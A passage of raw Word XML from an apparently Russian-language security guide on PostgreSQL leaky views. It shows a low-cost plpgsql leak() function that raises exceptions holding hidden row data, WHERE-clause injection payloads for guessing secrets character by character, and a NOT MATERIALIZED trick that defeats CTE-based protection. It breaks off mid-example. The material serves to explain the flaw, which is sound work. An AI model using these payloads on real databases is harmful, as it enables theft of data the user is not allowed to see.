          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NOT MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), и привязанный поверх view запрос становится эквивалентен прямому </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT FROM view WHERE leaky(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — leak возможен, как без CTE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4730D29D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH x AS MATERIALIZED (SELECT * FROM view) SELECT * FROM x WHERE leaky(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — явная </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:t>-форма (PG 12+) принудительно материализует — leak невозможен, как в PG ≤ 11.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370C9BAA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH x AS NOT MATERIALIZED (SELECT * FROM view) SELECT * FROM x WHERE leaky(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — явный inline, дефолт на PG 12+.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BC9F4C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Атакующий, который </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>уже</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеет leaky-функцию (или может её создать через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на user-schema), использует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NOT MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для гарантии leak в PG-12+-окружении. Если application пытается защититься через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH x AS (SELECT * FROM view)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (рассчитывая на pre-PG-12-поведение), attacker делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH x AS NOT MATERIALIZED (...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для отмены защиты — это и есть «обход CTE как ACL-механизма».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54381EF1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Setup для всех payload-ов 3.10.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0807F8F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- View с ACL-фильтром, БЕЗ security_barrier (дефолт)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E6E769" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE VIEW orders_visible AS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19486C28" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, customer_name, total, internal_notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A69F92D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E88E122" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE customer_id = current_setting('app.current_user_id')::int;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04318828" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B411FD9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Application-роль имеет SELECT только на orders_visible, не на orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6FC651" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT SELECT ON orders_visible TO app_user;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3717B5EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>REVOKE ALL ON orders FROM app_user;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AABD75" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6832F71C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Leaky-функция: атакующая (он же атакующий создаёт)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063EE390" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION leak(t text, guess text) RETURNS boolean AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ACBE7D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F149D93" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  IF t LIKE guess || '%' THEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EDD3EA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RAISE EXCEPTION 'leak-match: %', t;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E784BD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  END IF;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DBFA24" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  RETURN false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4017E264" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F54E058" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$ LANGUAGE plpgsql COST 0.0001;  -- exceptionally low cost для pushdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262F9292" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Function </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>leak(t, guess)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cost=0.0001</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — планировщик считает её крайне дешёвой и пушит до более дорогих фильтров. Внутри — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с pattern-match: при совпадении RAISE EXCEPTION с leaked-данными в message → 3.2 (error-based) канал.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A16B599" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для атак, где CREATE FUNCTION недоступен: используется встроенный оператор с известным leak-поведением — например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lower(secret_col) ~ 'guess.*'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (regex matching против атакующего pattern) или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>secret_col::int / 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (deliberate error если match) — оба работают как leaky-операторы, оба cost-низкие.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244157CB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — прямой leak без CTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D1DCD6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Baseline-payload, не использующий CTE. Демонстрирует leaky-view-проблему «как есть»:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0311F2A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>id IS NOT NULL AND leak(internal_notes, 'secret_pre')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6295F21D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D762465" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, customer_name, total FROM orders_visible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285F09B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE id IS NOT NULL AND leak(internal_notes, 'secret_pre')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61046ED8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Поведение PG 12+ при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>security_barrier=off</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021D4B9C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Планировщик inline-разворачивает view: запрос становится </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, customer_name, total FROM orders WHERE customer_id = current_setting(...) AND leak(internal_notes, 'secret_pre')</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EA4BCE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. По стоимости: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>leak()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cost=0.0001 (низшая), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_setting(...)::int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cost ≈ 0.1 (вызов setting), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>customer_id = X</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cost ≈ 0.0025 (integer comparison через btree).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6AF728" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Планировщик пушит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`leak()` первым</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — на каждой строке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>orders</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (включая чужие строки!).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1598716E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>leak()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> сравнивает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>internal_notes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'secret_pre%'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — если совпало, RAISE EXCEPTION с leaked-данными в message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14444FC5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Атакующий получает leak строк </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>orders</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, к которым у него нет прямого SELECT-доступа. Бинарный поиск по pattern: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'secret_pre_a'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'secret_pre_b'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, …, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'secret_pre_'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — символ за символом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB504FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — попытка app-защиты через WITH + обход через NOT MATERIALIZED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8D689B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Контекст: разработчик попытался защититься, обернув view-запрос в CTE с расчётом на «CTE = optimization fence». В коде:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF2BE19" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/orders.py — попытка защиты</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1473C357" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query = text(f"WITH safe AS (SELECT * FROM orders_visible) SELECT id, customer_name, total FROM safe WHERE {where_clause}")</w:t>
      </w:r>
    </w:p>
